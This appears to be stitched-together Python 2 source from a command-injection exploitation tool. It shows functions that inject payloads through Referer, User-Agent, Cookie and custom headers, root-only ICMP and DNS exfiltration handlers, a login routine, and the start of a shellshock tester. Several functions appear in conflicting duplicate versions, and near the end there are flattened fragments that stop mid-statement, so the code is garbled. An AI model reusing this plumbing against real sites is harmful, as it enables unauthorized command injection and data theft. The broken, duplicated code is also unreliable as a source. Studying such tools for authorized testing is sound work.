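def get_request_response(request):
  """Send *request* through the HTTP proxy given on the command line.

  Args:
    request: a ``urllib2.Request`` that already carries its headers/body.

  Behaviour (proxy path only -- that is all this excerpt shows):
    * ``urllib2.HTTPError``: unless ``settings.IGNORE_ERR_MSG`` is set, the
      error is printed as a critical message and ``checks.continue_tests`` asks
      the user whether to go on (``IGNORE_ERR_MSG`` is then set) or abort;
      ``response`` becomes ``False`` either way.
    * ``urllib2.URLError``: the reason text is printed and the run is aborted.

  NOTE(review): no ``return`` is visible here and ``response`` is not assigned
  when no proxy is configured -- confirm against the full file.
  """
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        # Keep the exception object under its own name: continue_tests() is
        # handed the exception, while the text goes to the message printer.
        # (The original rebound the exception name to a string and then
        # referenced an unbound ``err`` -> NameError.)
        err_msg = str(err) + "."
        if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
           settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
          print ""
        print settings.print_critical_msg(err_msg)
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      # str(reason) is expected to look like "[Errno N] text"; keep the text.
      err_msg = ' '.join(str(err.reason).split(" ")[2:]) + "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()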
def get_request_response(request):
  """Fetch *request* through the user-supplied HTTP proxy.

  An HTTP 500 (``settings.INTERNAL_SERVER_ERROR``) is swallowed silently; any
  other HTTP error is shown -- unless ``settings.IGNORE_ERR_MSG`` is set -- and
  ``checks.continue_tests`` lets the user decide whether to go on.  In both
  cases ``response`` ends up ``False``.  A refused TCP connection is reported
  as a critical message and ends the run.

  Args:
    request: a ``urllib2.Request`` already carrying its headers/body.

  NOTE(review): only the proxy branch is visible in this excerpt; a URLError
  whose reason is not "Connection refused" leaves ``response`` unbound here.
  """

  def spacer():
    # Blank line(s) ahead of a critical message; which ones are printed depends
    # on the verbosity level, the active technique state and session loading.
    if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
       settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
      print ""
    if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
      print ""

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, http_err:
      is_internal_error = str(http_err.code) == settings.INTERNAL_SERVER_ERROR
      if not is_internal_error and settings.IGNORE_ERR_MSG == False:
        spacer()
        print settings.print_critical_msg(str(http_err) + ".")
        if checks.continue_tests(http_err) == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, url_err:
      if "Connection refused" in url_err.reason:
        spacer()
        print settings.print_critical_msg("The target host is not responding. Please ensure that is up and try again.")
        raise SystemExit()
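def referer_injection_test(url, vuln_parameter, payload):
  """Send one probe request with *payload* placed in the ``Referer`` header.

  Args:
    url: target URL.
    vuln_parameter: parameter name under test; accepted for interface parity
      with the sibling ``*_injection_test`` helpers, not read here.
    payload: URL-encoded payload; ``urllib.unquote`` is applied before it is
      put into the header.

  ``response`` is bound to the opener's response, or to ``False`` after an HTTP
  error the user chose to ignore.  A transport error (``URLError``) prints a
  critical message and exits.
  NOTE(review): no ``return`` is visible in this excerpt -- confirm how callers
  obtain ``response``.
  """
  def inject_referer(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    request.add_header("Referer", urllib.unquote(payload))
    return opener.open(request)

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_referer(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      if "Connection refused" in err.reason:
        err_msg = "The target host is not responding. Please ensure that is up and try again."
      else:
        # Any other transport failure used to fall through and leave
        # ``response`` unbound; report the reason and stop instead.
        err_msg = str(err.reason) + "."
      print "\n" + Back.RED + settings.CRITICAL_SIGN + err_msg + Style.RESET_ALL
      raise SystemExit()
  else:
    # No proxy configured: exactly one direct request.  Previously a direct
    # request was always sent and a second one through the proxy on top of it,
    # doubling the traffic per payload.
    response = inject_referer(url, vuln_parameter, payload, None)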
def icmp_exfiltration_handler(url, http_request_method):
  """Build the request for the ICMP exfiltration option and send it through the
  configured HTTP proxy.

  Root is required (``os.geteuid() == 0``); otherwise an error is printed and
  the process exits.  For ``"GET"`` the vulnerable parameter is taken from the
  URL; for anything else the body comes from ``menu.options.data`` (unquoted
  and passed through ``parameters.do_POST_check`` first).

  Args:
    url: target URL.
    http_request_method: ``"GET"`` selects the query-string path.

  NOTE(review): only the proxy branch is visible here; ``response`` is not
  assigned when no proxy is configured -- confirm against the full file.
  """
  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + Back.RED + settings.ERROR_SIGN + "You need to have root privileges to run this option." + Style.RESET_ALL
    os._exit(0)

  def build_get_request():
    # Vulnerable parameter comes straight from the query string.
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    return request, vuln_parameter

  def build_post_request():
    # Body comes from --data; unquote and validate it before use.
    body = parameters.do_POST_check(urllib2.unquote(menu.options.data))
    request = urllib2.Request(url, body)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(body, url)
    return request, vuln_parameter

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    request, vuln_parameter = build_get_request()
  else:
    request, vuln_parameter = build_post_request()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, http_err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + settings.ERROR_SIGN + str(http_err) + Style.RESET_ALL
        if checks.continue_tests(http_err) == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
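def custom_header_injection(url, vuln_parameter, payload):
  """Send one request carrying *payload* in the ``settings.CUSTOM_HEADER_NAME`` header.

  Args:
    url: target URL.
    vuln_parameter: parameter name under test; accepted for interface parity
      with the sibling ``*_injection`` helpers, not read here.
    payload: URL-encoded payload; ``urllib.unquote`` is applied before it is
      put on the wire.

  Side effects: may set ``settings.IGNORE_ERR_MSG``; exits on a transport
  error or when the user declines to continue after an HTTP error.  When
  ``settings.TIME_RELATIVE_ATTACK`` is set a ``start`` timestamp is taken
  right before the request.
  NOTE(review): no ``return`` is visible in this excerpt -- confirm how callers
  obtain ``response``.
  """
  def inject_custom_header(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload))
    try:
      return opener.open(request)
    except ValueError:
      # Deliberately best-effort: a header value the library rejects yields
      # no response (None) rather than aborting the whole scan.
      return None

  def show_critical(msg):
    # Verbosity-dependent blank lines, then the critical message.
    if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \
       settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None:
      print ""
    if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
      print ""
    print settings.print_critical_msg(msg)

  if settings.TIME_RELATIVE_ATTACK:
    end = 0
    # Taken immediately before the single request below so the measured
    # delay covers exactly one round trip.
    start = time.time()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
      response = inject_custom_header(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if str(err.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        show_critical(str(err) + ".")
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      # str(reason) is expected to look like "[Errno N] text"; keep the text.
      err_msg = ' '.join(str(err.reason).split(" ")[2:]) + "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
  else:
    # No proxy configured: exactly one direct request.  The original sent a
    # direct request unconditionally and then a second one through the proxy,
    # doubling traffic per payload and skewing the timing anchor above.
    response = inject_custom_header(url, vuln_parameter, payload, None)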
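def cookie_injection(url, vuln_parameter, payload):
  """Send one request with ``vuln_parameter=payload`` as the ``Cookie`` header.

  Args:
    url: target URL.
    vuln_parameter: cookie name the payload is assigned to.
    payload: payload value; it is ``urllib.quote``d only when
      ``settings.TIME_RELATIVE_ATTACK`` is set.

  Side effects: may set ``settings.IGNORE_ERR_MSG``; exits on a transport
  error or when the user declines to continue after an HTTP error.
  NOTE(review): no ``return`` is visible in this excerpt -- confirm how callers
  obtain ``response``.
  """
  def inject_cookie(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    if settings.TIME_RELATIVE_ATTACK:
      payload = urllib.quote(payload)
    opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    try:
      return opener.open(request)
    except ValueError:
      # Deliberately best-effort: a value the library rejects yields no
      # response (None) rather than aborting the scan.
      return None

  if settings.TIME_RELATIVE_ATTACK:
    end = 0
    # Taken immediately before the single request so the measured delay
    # covers exactly one round trip.
    start = time.time()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL : menu.options.proxy})
      response = inject_cookie(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        err_msg = str(err) + "."
        print "\n" + settings.print_critical_msg(err_msg)
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      # str(reason) is expected to look like "[Errno N] text"; keep the text.
      err_msg = ' '.join(str(err.reason).split(" ")[2:]) + "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()
  else:
    # No proxy configured: exactly one direct request (the original always sent
    # a direct request first and a second one through the proxy on top of it).
    response = inject_cookie(url, vuln_parameter, payload, None)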
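def custom_header_injection_test(url, vuln_parameter, payload):
  """Send one probe with *payload* in the ``settings.CUSTOM_HEADER_NAME`` header.

  Args:
    url: target URL.
    vuln_parameter: accepted for interface parity with the sibling
      ``*_injection_test`` helpers; not read here.
    payload: URL-encoded payload, ``urllib.unquote``d before use.

  A ``start`` timestamp is always taken right before the request.  HTTP errors
  are reported via ``settings.print_error_msg`` and the user is asked whether
  to continue; transport errors print a critical message and exit.
  NOTE(review): no ``return`` is visible in this excerpt -- confirm how callers
  obtain ``response``.
  """
  def inject_custom_header(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    request.add_header(settings.CUSTOM_HEADER_NAME, urllib.unquote(payload))
    try:
      return opener.open(request)
    except ValueError:
      # Deliberately best-effort: yields no response (None) instead of aborting.
      return None

  end = 0
  # Timing anchor for the single request below.
  start = time.time()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_custom_header(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print settings.print_error_msg(err)
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      if "Connection refused" in err.reason:
        err_msg = "The target host is not responding."
        err_msg += " Please ensure that is up and try again."
      else:
        # Other transport failures used to fall through with ``response``
        # unbound; report the reason and stop instead.
        err_msg = str(err.reason) + "."
      print "\n" + settings.print_critical_msg(err_msg)
      raise SystemExit()
  else:
    # No proxy configured: exactly one direct request (the original sent a
    # direct request unconditionally and then a second one via the proxy).
    response = inject_custom_header(url, vuln_parameter, payload, None)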
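def cookie_injection_test(url, vuln_parameter, payload):
  """Send one probe with ``vuln_parameter=payload`` as the ``Cookie`` header.

  Args:
    url: target URL.
    vuln_parameter: cookie name the payload is assigned to.
    payload: payload value; ``urllib.quote``d so non-ASCII characters survive
      the header.

  A ``start`` timestamp is always taken right before the request.  HTTP errors
  are printed and the user is asked whether to continue; transport errors print
  a critical message and exit.
  NOTE(review): no ``return`` is visible in this excerpt -- confirm how callers
  obtain ``response``.
  """
  def inject_cookie(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    # Encoding non-ASCII characters payload.
    payload = urllib.quote(payload)
    opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    try:
      return opener.open(request)
    except ValueError:
      # Deliberately best-effort: yields no response (None) instead of aborting.
      return None

  end = 0
  # Timing anchor for the single request below.
  start = time.time()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_cookie(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print Back.RED + settings.ERROR_SIGN + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      if "Connection refused" in err.reason:
        err_msg = "The target host is not responding. Please ensure that is up and try again."
      else:
        # Other transport failures used to fall through with ``response``
        # unbound; report the reason and stop instead.
        err_msg = str(err.reason) + "."
      print "\n" + Back.RED + settings.CRITICAL_SIGN + err_msg + Style.RESET_ALL
      raise SystemExit()
  else:
    # No proxy configured: exactly one direct request (the original sent a
    # direct request unconditionally and then a second one via the proxy).
    response = inject_cookie(url, vuln_parameter, payload, None)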
def get_request_response(request):
  """Send *request* via the command-line HTTP proxy and bind ``response``.

  HTTP errors are printed (unless ``settings.IGNORE_ERR_MSG`` is set) and the
  user is asked whether to carry on; ``response`` then becomes ``False``.  A
  refused TCP connection prints a critical message and exits.

  Args:
    request: a ``urllib2.Request`` already carrying its headers/body.

  NOTE(review): only the proxy branch is visible; a URLError with any other
  reason leaves ``response`` unbound in this excerpt -- confirm against the
  full file.
  """
  def on_http_error(http_err):
    # Report, then let the user decide whether the scan continues.
    if settings.IGNORE_ERR_MSG == False:
      print "\n" + Back.RED + settings.ERROR_SIGN + str(http_err) + Style.RESET_ALL
      if checks.continue_tests(http_err) == True:
        settings.IGNORE_ERR_MSG = True
      else:
        raise SystemExit()
    return False

  def on_url_error(url_err):
    # Only a refused TCP connection is treated as fatal here.
    if "Connection refused" in url_err.reason:
      print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding. Please ensure that is up and try again." + Style.RESET_ALL
      raise SystemExit()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, http_err:
      response = on_http_error(http_err)
    except urllib2.URLError, url_err:
      on_url_error(url_err)
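def user_agent_injection_test(url, vuln_parameter, payload):
  """Send one probe with *payload* as the ``User-Agent`` header.

  Args:
    url: target URL.
    vuln_parameter: accepted for interface parity with the sibling
      ``*_injection_test`` helpers; not read here.
    payload: URL-encoded payload, ``urllib.unquote``d before use.

  A ``start`` timestamp is always taken right before the request.  HTTP errors
  are printed and the user is asked whether to continue; transport errors print
  a critical message and exit.
  NOTE(review): no ``return`` is visible in this excerpt -- confirm how callers
  obtain ``response``.
  """
  def inject_user_agent(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener; errors propagate.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    request.add_header('User-Agent', urllib.unquote(payload))
    return opener.open(request)

  end = 0
  # Timing anchor for the single request below.
  start = time.time()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_user_agent(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + Back.RED + "(x) Error: " + str(err) + Style.RESET_ALL
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      if "Connection refused" in err.reason:
        err_msg = "The target host is not responding. Please ensure that is up and try again."
      else:
        # Other transport failures used to fall through with ``response``
        # unbound; report the reason and stop instead.
        err_msg = str(err.reason) + "."
      print "\n" + Back.RED + "(x) Critical: " + err_msg + Style.RESET_ALL
      raise SystemExit()
  else:
    # No proxy configured: exactly one direct request (the original sent a
    # direct request unconditionally and then a second one via the proxy).
    response = inject_user_agent(url, vuln_parameter, payload, None)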
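def cookie_injection_test(url, vuln_parameter, payload):
  """Send one probe with ``vuln_parameter=payload`` as the ``Cookie`` header.

  Args:
    url: target URL.
    vuln_parameter: cookie name the payload is assigned to.
    payload: payload value, sent as given (no quoting in this version).

  HTTP errors are reported via ``settings.print_error_msg`` and the user is
  asked whether to continue; transport errors print a critical message and exit.
  NOTE(review): no ``return`` is visible in this excerpt -- confirm how callers
  obtain ``response``.
  """
  def inject_cookie(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    opener.addheaders.append(('Cookie', vuln_parameter + "=" + payload))
    request = urllib2.Request(url)
    # Check if defined extra headers.
    headers.do_check(request)
    try:
      return opener.open(request)
    except ValueError:
      # Deliberately best-effort: yields no response (None) instead of aborting.
      return None

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_cookie(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        err_msg = str(err) + "."
        print "\n" + settings.print_error_msg(err_msg)
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      if "Connection refused" in err.reason:
        err_msg = "The target host is not responding."
        err_msg += " Please ensure that is up and try again."
      else:
        # Other transport failures used to fall through with ``response``
        # unbound; report the reason and stop instead.
        err_msg = str(err.reason) + "."
      print "\n" + settings.print_critical_msg(err_msg)
      raise SystemExit()
  else:
    # No proxy configured: exactly one direct request (the original sent a
    # direct request unconditionally and then a second one via the proxy).
    response = inject_cookie(url, vuln_parameter, payload, None)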
def get_request_response(request):
  """Issue *request* through the command-line HTTP proxy and bind ``response``.

  An HTTP error is reported with ``settings.print_error_msg`` (unless
  ``settings.IGNORE_ERR_MSG`` is set) and ``checks.continue_tests`` decides
  between continuing and ``SystemExit``; ``response`` becomes ``False``.  A
  refused TCP connection prints a critical message and exits.

  Args:
    request: a ``urllib2.Request`` already carrying its headers/body.

  NOTE(review): only the proxy branch is visible; a URLError with any other
  reason leaves ``response`` unbound in this excerpt.
  """
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, http_err:
      response = False
      if settings.IGNORE_ERR_MSG == False:
        print settings.print_error_msg(http_err)
        keep_going = checks.continue_tests(http_err)
        if keep_going == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
    except urllib2.URLError, url_err:
      if "Connection refused" in url_err.reason:
        parts = ["The target host is not responding.",
                 " Please ensure that is up and try again."]
        print "\n" + settings.print_critical_msg("".join(parts))
        raise SystemExit()
def dns_exfiltration_handler(url, http_request_method):
  """Build the request for the DNS exfiltration option and send it through the
  configured HTTP proxy.

  Marks the detection phase (``settings.DETECTION_PHASE`` on,
  ``settings.EXPLOITATION_PHASE`` off), requires root (``os.geteuid() == 0``)
  and builds either a GET request (vulnerable parameter from the URL) or a
  request with a body taken from ``menu.options.data``.

  Args:
    url: target URL.
    http_request_method: ``"GET"`` selects the query-string path.

  NOTE(review): only the proxy branch is visible here; ``response`` is not
  assigned when no proxy is configured -- confirm against the full file.
  """
  # Check injection state
  settings.DETECTION_PHASE = True
  settings.EXPLOITATION_PHASE = False

  # You need to have root privileges to run this script
  if os.geteuid() != 0:
    print "\n" + settings.print_critical_msg("You need to have root privileges to run this option.")
    os._exit(0)

  def build_get_request():
    # Vulnerable parameter comes straight from the query string.
    vuln_parameter = parameters.vuln_GET_param(url)
    request = urllib2.Request(url)
    headers.do_check(request)
    return request, vuln_parameter

  def build_post_request():
    # Body comes from --data; unquote and validate it before use.
    body = parameters.do_POST_check(urllib2.unquote(menu.options.data))
    request = urllib2.Request(url, body)
    headers.do_check(request)
    vuln_parameter = parameters.vuln_POST_param(body, url)
    return request, vuln_parameter

  if http_request_method == "GET":
    #url = parameters.do_GET_check(url)
    request, vuln_parameter = build_get_request()
  else:
    request, vuln_parameter = build_post_request()

  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, http_err:
      if str(http_err.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        print "\n" + settings.print_critical_msg(str(http_err) + ".")
        if checks.continue_tests(http_err) == True:
          settings.IGNORE_ERR_MSG = True
        else:
          os._exit(0)
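def authentication_process():
  """Log in at ``menu.options.auth_url`` with ``menu.options.auth_data`` and keep
  the session cookies in ``menu.options.cookie``.

  Steps: open the login URL once with a cookie-aware opener to collect the
  cookies the server sets, join them as ``name=value; `` pairs into
  ``menu.options.cookie``, install that opener globally, then send the
  credentials (through the HTTP proxy when one is configured).

  Side effects: ``urllib2.install_opener``, ``menu.options.cookie`` and
  possibly ``settings.IGNORE_ERR_MSG``.
  NOTE(review): only the proxy branch of the credential request is visible;
  ``response`` is not assigned otherwise -- confirm against the full file.
  """
  auth_url = menu.options.auth_url
  auth_data = menu.options.auth_data
  cj = cookielib.CookieJar()
  opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
  # First hit the login page so the server hands out its cookies.
  request = opener.open(urllib2.Request(auth_url))
  cookies = "".join(cookie.name + "=" + cookie.value + "; " for cookie in cj)
  if len(cookies) != 0:
    menu.options.cookie = cookies.rstrip()
    if menu.options.verbose:
      success_msg = "The received cookie is " + Style.UNDERLINE
      success_msg += menu.options.cookie + Style.RESET_ALL + "."
      print settings.print_success_msg(success_msg)
  urllib2.install_opener(opener)
  request = urllib2.Request(auth_url, auth_data)
  # Check if defined extra headers.
  headers.do_check(request)
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      response = proxy.use_proxy(request)
    except urllib2.HTTPError, err:
      if settings.IGNORE_ERR_MSG == False:
        print "\n" + settings.print_error_msg(err)
        # Hand continue_tests() the exception itself (the original referenced
        # an unbound ``err`` here -> NameError on every HTTP error).
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False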
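def cookie_injection(url, vuln_parameter, payload):
  """Send one request whose ``Cookie`` header is ``menu.options.cookie`` with
  ``settings.INJECT_TAG`` replaced by *payload*.

  Args:
    url: target URL; trimmed with ``parameters.get_url_part`` when no POST
      data is defined.
    vuln_parameter: accepted for interface parity with the sibling helpers;
      not read here.
    payload: payload value; ``urllib.quote``d when
      ``settings.TIME_RELATIVE_ATTACK`` is set.

  Side effects: rewrites ``menu.options.data`` from
  ``settings.USER_DEFINED_POST_DATA`` when POST data is defined; may set
  ``settings.IGNORE_ERR_MSG``; exits on a transport error or when the user
  declines to continue.
  NOTE(review): only the proxy branch is visible and no ``return`` appears;
  confirm the no-proxy path and how callers obtain ``response``.
  """
  def inject_cookie(url, vuln_parameter, payload, proxy):
    # One request through a plain or proxied opener.
    if proxy is None:
      opener = urllib2.build_opener()
    else:
      opener = urllib2.build_opener(proxy)
    if settings.TIME_RELATIVE_ATTACK:
      payload = urllib.quote(payload)
    # Check if defined POST data
    if menu.options.data:
      menu.options.data = settings.USER_DEFINED_POST_DATA
      request = urllib2.Request(url, menu.options.data)
    else:
      url = parameters.get_url_part(url)
      request = urllib2.Request(url)
    #Check if defined extra headers.
    headers.do_check(request)
    request.add_header('Cookie', menu.options.cookie.replace(settings.INJECT_TAG, payload))
    try:
      headers.check_http_traffic(request)
      return opener.open(request)
    except ValueError:
      # Deliberately best-effort: yields no response (None) instead of aborting.
      return None

  if settings.TIME_RELATIVE_ATTACK:
    end = 0
    # Timing anchor taken right before the request.
    start = time.time()

  proxy = None
  # Check if defined any HTTP Proxy.
  if menu.options.proxy:
    try:
      proxy = urllib2.ProxyHandler({settings.PROXY_PROTOCOL: menu.options.proxy})
      response = inject_cookie(url, vuln_parameter, payload, proxy)
    except urllib2.HTTPError, err:
      if str(err.code) == settings.INTERNAL_SERVER_ERROR:
        response = False
      elif settings.IGNORE_ERR_MSG == False:
        err_msg = str(err) + "."
        print "\n" + settings.print_critical_msg(err_msg)
        # Hand continue_tests() the exception itself; the original rebound the
        # exception name to a string and then referenced an unbound ``err``.
        continue_tests = checks.continue_tests(err)
        if continue_tests == True:
          settings.IGNORE_ERR_MSG = True
        else:
          raise SystemExit()
      response = False
    except urllib2.URLError, err:
      # str(reason) is expected to look like "[Errno N] text"; keep the text.
      err_msg = ' '.join(str(err.reason).split(" ")[2:]) + "."
      if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False:
        print ""
      print settings.print_critical_msg(err_msg)
      raise SystemExit()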
# Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err_msg: if str(err_msg.code) == settings.INTERNAL_SERVER_ERROR: response = False elif settings.IGNORE_ERR_MSG == False: err = str(err_msg) + "." if not settings.VERBOSITY_LEVEL >= 1 and settings.TIME_BASED_STATE == False or \ settings.VERBOSITY_LEVEL >= 1 and settings.EVAL_BASED_STATE == None: print "" if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err) continue_tests = checks.continue_tests(err_msg) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err_msg: err_msg = str(err_msg.reason).split(" ")[2:] err_msg = ' '.join(err_msg)+ "." if settings.VERBOSITY_LEVEL >= 1 and settings.LOAD_SESSION == False: print "" print settings.print_critical_msg(err_msg) raise SystemExit() else: try:
response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \ " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit() # Check if defined Tor. elif menu.options.tor: try: response = tor.use_tor(request) except urllib2.HTTPError, err: if settings.IGNORE_ERR_MSG == False: print "\n" + Back.RED + settings.ERROR_SIGN + str( err) + Style.RESET_ALL continue_tests = checks.continue_tests(err) if continue_tests == True: settings.IGNORE_ERR_MSG = True else: raise SystemExit() response = False except urllib2.URLError, err: if "Connection refused" in err.reason: print "\n" + Back.RED + settings.CRITICAL_SIGN + "The target host is not responding." + \ " Please ensure that is up and try again." + Style.RESET_ALL raise SystemExit() else: try: response = urllib2.urlopen(request) except urllib2.HTTPError, err:
def shellshock_handler(url, http_request_method, filename):
  """Probe every header in ``headers`` with the test payload of every CVE in
  ``shellshock_cves`` and, on a hit, run the interactive follow-ups
  (enumeration, file access, a one-shot ``--os-cmd`` or the pseudo-terminal).

  Args:
    url: target URL.
    http_request_method: accepted for interface parity; not read in this body.
    filename: log file handed to the ``logs.*`` helpers.

  Returns:
    ``False``/``True`` from the pseudo-terminal paths (``no_result`` decides
    which); otherwise the function falls off the end (``None``) or exits via
    ``sys.exit`` / ``SystemExit``.

  NOTE(review): ``counter`` is never incremented, so ``logs.update_payload``
  always receives 1; ``go_back_again`` is assigned but never read here.
  """
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "results-based command injection"
  technique = "shellshock injection technique"
  sys.stdout.write("(*) Testing the "+ technique + "... ")
  sys.stdout.flush()
  try:
    i = 0
    total = len(shellshock_cves) * len(headers)
    for cve in shellshock_cves:
      for check_header in headers:
        i = i + 1
